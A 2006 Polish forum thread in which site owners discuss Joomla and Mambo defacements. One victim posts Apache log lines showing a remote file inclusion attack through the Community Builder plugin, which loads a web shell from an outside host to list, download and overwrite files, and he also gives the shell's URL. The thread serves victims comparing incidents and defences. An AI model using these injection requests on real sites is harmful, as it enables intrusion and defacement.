Joomla dziurawa jak durszlak :-/

**hazael** · 08-08-2006, 17:25

Wlasnie godzine temu 5 osob z poza naszego kraju zaatakowało moją witrynę i wyczysciły mi połowe plików z joomla. Zrobili to na moich oczach jak serwowałem po stronce. Dzwoniłem do admina, u którego mam postawiona witryne i z logów okazało się, ze wlam nastąpił poprzez panel administratora w systemie joomla. Jescze dziś bedę wiedział jakimi programami posługiwali się sprawcy i ktore pliki atakowali.

Ps. podobny atak nastąpił miesiąc temu na strone postawioną na mambo u mojego kumpla na osobnym serwerze - myslę, że to Ci sami sprawcy.

**zwiastun** · 08-08-2006, 17:39

Faktom trudno przeczyć. A fakty sa też takie, że tysiące stron postawiono na Joomla. I stoją. Co nie znaczy, oczywiście, że ktoś dziury w całym nie znalazł. Ale skoroś już postraszył, to teraz dotrzymaj, coś obiecał, koniecznie!

**hazael** · 08-08-2006, 17:41

no admin obiecal mi zrobic analize tego co bylo hackowane i jakimi progrmami. jescze dziś ma mi przeslac wyniki.

W kazdym razie kasują, lub zmieniają czesc plików tak, aby strona wyswietlała jedynie ich nicki. Mi podpisał sie gość w taki sposób:

owned by kainooo........ owned by kainooo........ owned by kainooo........ owned by kainooo........

ksiadz · 08-08-2006, 18:14

trzeba, szukac serwerów z zainstalowanym mod security i wiele problemow sie rozwiazuje..

niestety takie rozwiazanie sporo "ssie" dlatego jest zadko instalowane:/

**vj_** · 08-08-2006, 18:50

Pomijajac fakt tego co sie stalo powyzej, mozna tez zastosowac takie zabezpieczenia jak htaccess, poczytajcie sobie tutaj.

**hazael** · 08-08-2006, 19:06

Jak się dowiedziałem, z logów wynika, że sa to ludzie z Turcji. Ale admin podważa ten fakt, bo strona z ktorej pobrali skrypty dzięki ktorymi dokonany zostal wlam jest z Polski. Pewnie polaczenie bylo przez elite proxy.

Dokładnie podmiana nastąpiła po wysłaniu POST (w logach 16:00:32), ponieważ dopiero po tym zabiegu zmienił się rozmiar głównego indexu:

194.165.130.93 - - [08/Aug/2006:15:59:20 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome %2Fwww%2Fserwis&sort=0a
HTTP/1.1" 200 6760
194.165.130.93 - - [08/Aug/2006:15:59:34 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome %2Fwww%2Fserwis%2Ftemplates&sort=0a
HTTP/1.1" 200 4891
194.165.130.93 - - [08/Aug/2006:15:59:47 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome %2Fwww%2Fserwis&sort=0a
HTTP/1.1" 200 6758
194.165.130.93 - - [08/Aug/2006:15:59:58 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.ph p&ft=download&d=%2Fhome%2Fwww%2Fserwis
HTTP/1.1" 200 7210
194.165.130.93 - - [08/Aug/2006:16:00:06 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.ph p&ft=edit&d=%2Fhome%2Fwww%2Fserwis
HTTP/1.1" 200 6921
194.165.130.93 - - [08/Aug/2006:16:00:32 +0200] "POST
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=f&f=index.ph p&ft=edit&d=%2Fhome%2Fwww%2Fserwis%2F
HTTP/1.1" 200 4201
194.165.130.93 - - [08/Aug/2006:16:00:59 +0200] "GET
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http%3A%2 F%2Fxdaportal.info%2Fa%2F1.txt%3F&act=ls&d=%2Fhome %2Fwww%2Fserwis%2F&sort=0aHTTP/1.1"
200 6759

Dziwne, bo wszystko idzie przez community bulider - moj kumpel nie posiada tego komponentu i ma mambo a jego strone podobnie shackowano - ci sami hackerzy sie podpisali...

**hazael** · 08-08-2006, 20:03

w logach zostal slad - link do strony - na na niej jest umieszczony skrypt programu, za pomocą ktorego prawdopodobnie mozna dokonywac wlamu.

http://xdaportal.info/a/1.txt

jesli ktos qmaty w tej sprawie, proszę aby się temu przyjrzec.

**sogo** · 08-08-2006, 20:08

mnie turki zrobiły kuku na dwóch stronach, w jednej joomla podmienili plik configuration.php i wyświetlała się ich stronka z waleczną muzyczką i osóbkami z kałachami w rączkach. Druga strona to podmiana pliku index.html na której było intro do joomla. Tak więc krzywdy wielkiej nie zrobili bo wystarczyło wgrać oryginalne pliki ponownie. Chmody były prawidłowo ustawione, zadziwia fakt, że tak łatwo można wejść na serwer i podmieniać pliki. Następny fakt wiąże się z najnowszym skryptem coppermine gallery, hosting zablokował mi ten skrypt bo nastąpiło przeciążenie ich serwera atakiem DOS, powodowało to wielki ruch z zapytaniam do bazy. Orzeczono wadę skryptu. Ten sam skrypt na krasnalu powodował ciągłe, nieustające komunikaty kaspersky`ego o ataku. Tak więc musiałem wycofać się z tej galerii.Na pocieszenie informacja, znajomemu w Kanadzie te same turki zrobiły to samo, tak więc to jakaś akcja ogólnoświatowa

.
pozdr.

**hazael** · 08-08-2006, 20:12

bardzo ciekawe, tylko ze "Turki" mają ten skrypt na polskiej stronie, ktora jest wykonana w MAMBO. http://xdaportal.info - na pewno nie jest turecką stroną a z tego miejsca zostal dokonany atak na moją strone, mimo, ze identyfikowali sie z IP jako z Turcji. Jestem prawie pewny, że to Polacy podający sie za Turków.

**sogo** · 08-08-2006, 20:19

nie mając pewności dlatego pisałem turki z małej litery

Temat: Joomla dziurawa jak durszlak :-/

Przybornik

Widok

Joomla dziurawa jak durszlak :-/

apache mod_security

Reguły pisania